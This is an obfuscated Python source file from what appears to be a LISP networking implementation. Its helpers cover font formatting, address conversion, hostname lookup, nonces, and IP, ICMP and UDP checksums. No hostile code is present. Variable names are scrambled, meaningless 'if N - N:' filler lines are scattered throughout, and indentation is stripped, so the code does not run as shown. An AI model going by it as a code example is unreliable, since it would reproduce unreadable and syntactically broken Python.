if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
def blue ( string , html ) :
if ( html ) : return ( '<font color="blue"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[94m" + string + "\033[0m" , html ) )
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
def bold ( string , html ) :
if ( html ) : return ( "<b>{}</b>" . format ( string ) )
return ( "\033[1m" + string + "\033[0m" )
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
def convert_font ( string ) :
i11i1i1I1iI1 = [ [ "[91m" , red ] , [ "[92m" , green ] , [ "[94m" , blue ] , [ "[1m" , bold ] ]
O0ooOo0 = "[0m"
if 53 - 53: OoooooooOO - IiII
for oOo in i11i1i1I1iI1 :
i1i = oOo [ 0 ]
IIIiiiI = oOo [ 1 ]
OoO00oo00 = len ( i1i )
ooo = string . find ( i1i )
if ( ooo != - 1 ) : break
if 76 - 76: OoooooooOO + Oo0Ooo % IiII . OoO0O00 + II111iiii
if 70 - 70: I1IiiI / I11i
while ( ooo != - 1 ) :
IIiiiiIiIIii = string [ ooo : : ] . find ( O0ooOo0 )
O0OO = string [ ooo + OoO00oo00 : ooo + IIiiiiIiIIii ]
string = string [ : ooo ] + IIIiiiI ( O0OO , True ) + string [ ooo + IIiiiiIiIIii + OoO00oo00 : : ]
if 39 - 39: I1ii11iIi11i + I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo
ooo = string . find ( i1i )
if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
if ( string . find ( "[1m" ) != - 1 ) : string = convert_font ( string )
return ( string )
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
def lisp_space ( num ) :
Oo0Ooo0O0 = ""
for IiIIi1IiiIiI in range ( num ) : Oo0Ooo0O0 += " "
return ( Oo0Ooo0O0 )
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
def lisp_button ( string , url ) :
I11i1iIiiIiIi = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
if ( url == None ) :
i1I1i = I11i1iIiiIiIi + string + "</button>"
else :
OO0o = '<a href="{}">' . format ( url )
IiII1iiI = lisp_space ( 2 )
i1I1i = IiII1iiI + OO0o + I11i1iIiiIiIi + string + "</button></a>" + IiII1iiI
if 34 - 34: I1IiiI . oO0o + i1IIi
return ( i1I1i )
if 98 - 98: oO0o % IiII * i11iIiiIii % I1ii11iIi11i
if 29 - 29: IiII
if 66 - 66: Oo0Ooo
if 97 - 97: i1IIi - OoooooooOO / I1Ii111 * I1IiiI
if 55 - 55: o0oOOo0O0Ooo . iII111i
if 87 - 87: o0oOOo0O0Ooo % iIii1I11I1II1
if 100 - 100: I1Ii111 . I1IiiI * I1Ii111 - I1IiiI . I11i * Ii1I
def lisp_print_cour ( string ) :
Oo0Ooo0O0 = '<font face="Courier New">{}</font>' . format ( string )
return ( Oo0Ooo0O0 )
if 89 - 89: OoO0O00 + IiII * I1Ii111
if 28 - 28: OoooooooOO . oO0o % I1ii11iIi11i / i1IIi / OOooOOo
if 36 - 36: o0oOOo0O0Ooo + I11i - IiII + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
def lisp_print_sans ( string ) :
Oo0Ooo0O0 = '<font face="Sans-Serif">{}</font>' . format ( string )
return ( Oo0Ooo0O0 )
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
def lisp_span ( string , hover_string ) :
Oo0Ooo0O0 = '<span title="{}">{}</span>' . format ( hover_string , string )
return ( Oo0Ooo0O0 )
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
def lisp_eid_help_hover ( output ) :
iiIIii = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
if 70 - 70: o0oOOo0O0Ooo - OOooOOo
if 62 - 62: I11i
O000oOo = lisp_span ( output , iiIIii )
return ( O000oOo )
if 53 - 53: iIii1I11I1II1 + o0oOOo0O0Ooo - OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
def lisp_geo_help_hover ( output ) :
iiIIii = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
O000oOo = lisp_span ( output , iiIIii )
return ( O000oOo )
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
def space ( num ) :
Oo0Ooo0O0 = ""
for IiIIi1IiiIiI in range ( num ) : Oo0Ooo0O0 += " "
return ( Oo0Ooo0O0 )
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
def lisp_get_ephemeral_port ( ) :
return ( random . randrange ( 32768 , 65535 ) )
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
def lisp_get_data_nonce ( ) :
return ( random . randint ( 0 , 0xffffff ) )
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
def lisp_get_control_nonce ( ) :
return ( random . randint ( 0 , ( 2 ** 64 ) - 1 ) )
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
def lisp_hex_string ( integer_value ) :
i11II = hex ( integer_value ) [ 2 : : ]
if ( i11II [ - 1 ] == "L" ) : i11II = i11II [ 0 : - 1 ]
return ( i11II )
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
def lisp_get_timestamp ( ) :
return ( time . time ( ) )
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
if 65 - 65: II111iiii - I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 * iII111i + Ii1I
if 79 - 79: ooOoO0o . OoOoOO00 % I1Ii111 - Oo0Ooo
def lisp_set_timestamp ( seconds ) :
return ( time . time ( ) + seconds )
if 69 - 69: ooOoO0o - o0oOOo0O0Ooo . ooOoO0o
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
def lisp_print_elapsed ( ts ) :
if ( ts == 0 or ts == None ) : return ( "never" )
oO000o0Oo00 = time . time ( ) - ts
oO000o0Oo00 = round ( oO000o0Oo00 , 0 )
return ( str ( datetime . timedelta ( seconds = oO000o0Oo00 ) ) )
if 77 - 77: iIii1I11I1II1 + OoO0O00 . I1ii11iIi11i % OoO0O00
if 93 - 93: O0
if 85 - 85: i11iIiiIii % i11iIiiIii + O0 / OOooOOo
if 89 - 89: Ii1I % i1IIi % oO0o
if 53 - 53: oO0o * OoooooooOO . OoOoOO00
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
def lisp_print_future ( ts ) :
if ( ts == 0 ) : return ( "never" )
iiIiII11i1 = ts - time . time ( )
if ( iiIiII11i1 < 0 ) : return ( "expired" )
iiIiII11i1 = round ( iiIiII11i1 , 0 )
return ( str ( datetime . timedelta ( seconds = iiIiII11i1 ) ) )
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
if 90 - 90: I1ii11iIi11i . ooOoO0o . OoOoOO00 . Ii1I
if 4 - 4: Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
def lisp_print_eid_tuple ( eid , group ) :
I11i11i1 = eid . print_prefix ( )
if ( group . is_null ( ) ) : return ( I11i11i1 )
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
iI1i1iIi1iiII = group . print_prefix ( )
o0OoO0000o = group . instance_id
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if ( eid . is_null ( ) or eid . is_exact_match ( group ) ) :
ooo = iI1i1iIi1iiII . find ( "]" ) + 1
return ( "[{}](*, {})" . format ( o0OoO0000o , iI1i1iIi1iiII [ ooo : : ] ) )
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
II11I = eid . print_sg ( group )
return ( II11I )
if 31 - 31: Ii1I
if 18 - 18: ooOoO0o + Ii1I
if 5 - 5: OoooooooOO + I11i * II111iiii
if 98 - 98: OOooOOo % i1IIi . I1IiiI . II111iiii . I1ii11iIi11i / i11iIiiIii
if 32 - 32: o0oOOo0O0Ooo + I1IiiI . I1Ii111
if 41 - 41: OoOoOO00 . i11iIiiIii / I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
def lisp_convert_6to4 ( addr_str ) :
if ( addr_str . find ( "::ffff:" ) == - 1 ) : return ( addr_str )
IiiIIi1 = addr_str . split ( ":" )
return ( IiiIIi1 [ - 1 ] )
if 28 - 28: o0oOOo0O0Ooo
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if 14 - 14: I1ii11iIi11i + i11iIiiIii
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
if 7 - 7: I1ii11iIi11i - oO0o * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i
if 85 - 85: O0
def lisp_convert_4to6 ( addr_str ) :
IiiIIi1 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
if ( IiiIIi1 . is_ipv4_string ( addr_str ) ) : addr_str = "::ffff:" + addr_str
IiiIIi1 . store_address ( addr_str )
return ( IiiIIi1 )
if 32 - 32: OoooooooOO . OoO0O00 / Oo0Ooo * o0oOOo0O0Ooo / o0oOOo0O0Ooo * Ii1I
if 19 - 19: Ii1I
if 55 - 55: OOooOOo % OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
if 71 - 71: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
def lisp_gethostbyname ( string ) :
IIi1 = string . split ( "." )
OoO0oO = string . split ( ":" )
Ii = string . split ( "-" )
if 20 - 20: o0oOOo0O0Ooo * ooOoO0o
if ( len ( IIi1 ) > 1 ) :
if ( IIi1 [ 0 ] . isdigit ( ) ) : return ( string )
if 10 - 10: I11i - Oo0Ooo
if ( len ( OoO0oO ) > 1 ) :
try :
int ( OoO0oO [ 0 ] , 16 )
return ( string )
except :
pass
if 59 - 59: OoooooooOO * Oo0Ooo + i1IIi
if 23 - 23: ooOoO0o
if 13 - 13: iIii1I11I1II1
if 77 - 77: i11iIiiIii - iIii1I11I1II1 / oO0o / ooOoO0o / OoO0O00
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if ( len ( Ii ) == 3 ) :
for IiIIi1IiiIiI in range ( 3 ) :
try : int ( Ii [ IiIIi1IiiIiI ] , 16 )
except : break
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
try :
IiiIIi1 = socket . gethostbyname ( string )
return ( IiiIIi1 )
except :
if ( lisp_is_alpine ( ) == False ) : return ( "" )
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
try :
IiiIIi1 = socket . getaddrinfo ( string , 0 ) [ 0 ]
if ( IiiIIi1 [ 3 ] != string ) : return ( "" )
IiiIIi1 = IiiIIi1 [ 4 ] [ 0 ]
except :
IiiIIi1 = ""
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
return ( IiiIIi1 )
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
def lisp_ip_checksum ( data , hdrlen = 20 ) :
if ( len ( data ) < hdrlen ) :
lprint ( "IPv4 packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
Ooo0oO = binascii . hexlify ( data )
if 32 - 32: i1IIi . iII111i + II111iiii - OoO0O00 - iIii1I11I1II1
if 20 - 20: OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , hdrlen * 2 , 4 ) :
Oo0 += int ( Ooo0oO [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
Oo0 = struct . pack ( "H" , Oo0 )
Ooo0oO = data [ 0 : 10 ] + Oo0 + data [ 12 : : ]
return ( Ooo0oO )
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
def lisp_icmp_checksum ( data ) :
if ( len ( data ) < 36 ) :
lprint ( "ICMP packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
O00ooooo00 = binascii . hexlify ( data )
if 94 - 94: I11i - II111iiii . I1IiiI - Oo0Ooo + I1ii11iIi11i * I1ii11iIi11i
if 27 - 27: IiII * I1IiiI . iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , 36 , 4 ) :
Oo0 += int ( O00ooooo00 [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
Oo0 = struct . pack ( "H" , Oo0 )
O00ooooo00 = data [ 0 : 2 ] + Oo0 + data [ 4 : : ]
return ( O00ooooo00 )
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
if 29 - 29: iIii1I11I1II1 - OoO0O00 + I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
def lisp_udp_checksum ( source , dest , data ) :
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
IiII1iiI = lisp_address ( LISP_AFI_IPV6 , source , LISP_IPV6_HOST_MASK_LEN , 0 )
OooOOOoOoo0O0 = lisp_address ( LISP_AFI_IPV6 , dest , LISP_IPV6_HOST_MASK_LEN , 0 )
O0OOOOo0 = socket . htonl ( len ( data ) )
OOooO0Oo00 = socket . htonl ( LISP_UDP_PROTOCOL )
iIIIIIIIiIII = IiII1iiI . pack_address ( )
iIIIIIIIiIII += OooOOOoOoo0O0 . pack_address ( )
iIIIIIIIiIII += struct . pack ( "II" , O0OOOOo0 , OOooO0Oo00 )
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
o0oOo00 = binascii . hexlify ( iIIIIIIIiIII + data )
IiI1III = len ( o0oOo00 ) % 4
for IiIIi1IiiIiI in range ( 0 , IiI1III ) : o0oOo00 += "0"
if 91 - 91: I11i + Ii1I - OoOoOO00 - OoO0O00 + IiII
if 33 - 33: OoO0O00 - Oo0Ooo / ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , len ( o0oOo00 ) , 4 ) :
Oo0 += int ( o0oOo00 [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
